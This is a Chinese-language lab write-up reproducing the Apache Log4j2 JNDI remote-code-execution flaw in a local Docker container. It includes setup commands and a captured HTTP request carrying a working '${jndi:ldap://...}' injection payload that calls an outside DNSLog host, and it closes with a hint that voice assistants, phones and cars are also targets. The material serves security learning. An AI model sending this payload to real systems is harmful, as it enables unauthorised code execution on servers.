漏洞简介
Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。
目前受影响的Apache Log4j2版本:
2.0 ≤ Apache Log4j <= 2.14.1
漏洞复现
在下载镜像复现之前确保,虚拟机非处于挂起状态!
在下载镜像复现之前确保,虚拟机非处于挂起状态!
在下载镜像复现之前确保,虚拟机非处于挂起状态!
感谢风炫大佬耐心解答
┌──(root💀guiltyfet)-[/home/guiltyfet] └─# docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln Using default tag: latest latest: Pulling from fengxuan/log4j_vuln Digest: sha256:d929cad3243483f2f3cec6b7281a02873d9e6661dc00b5f0313429c04912d71d Status: Image is up to date for registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln:latest ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# docker run -it -d -p 8080:8080 --name log4j_vuln_container registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 8b707e3bc843cc4adc64b97a7237bf887ff6b31d5156d66a930b6b8861138a9b ┌──(root💀guiltyfet)-[/home/guiltyfet] └─# docker exec -it log4j_vuln_container /bin/bash [root@8b707e3bc843 ansible]# /bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh Using CATALINA_BASE: /home/apache-tomcat-8.5.45 Using CATALINA_HOME: /home/apache-tomcat-8.5.45 Using CATALINA_TMPDIR: /home/apache-tomcat-8.5.45/temp Using JRE_HOME: /usr/local/jdk1.8.0_144/ Using CLASSPATH: /home/apache-tomcat-8.5.45/bin/bootstrap.jar:/home/apache-tomcat-8.5.45/bin/tomcat-juli.jar Tomcat started. [root@8b707e3bc843 ansible]#
http://127.0.0.1:8080/webstudy/hello-fengxuan
更改burp与SwitchyOmega默认端口
POST /webstudy/hello-fengxuan HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; ECS[visit_times]=1; private_content_version=e48e945c4e066c5afa30b51edd7c4541; pma_lang=en; pma_collation_connection=utf8_unicode_ci Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 41 c=${jndi:ldap://bb772939.dns.1433.eu.org}
万物皆可
一.语音助手
二.手机桌面
三.某蓝牙
四.某车
于是…
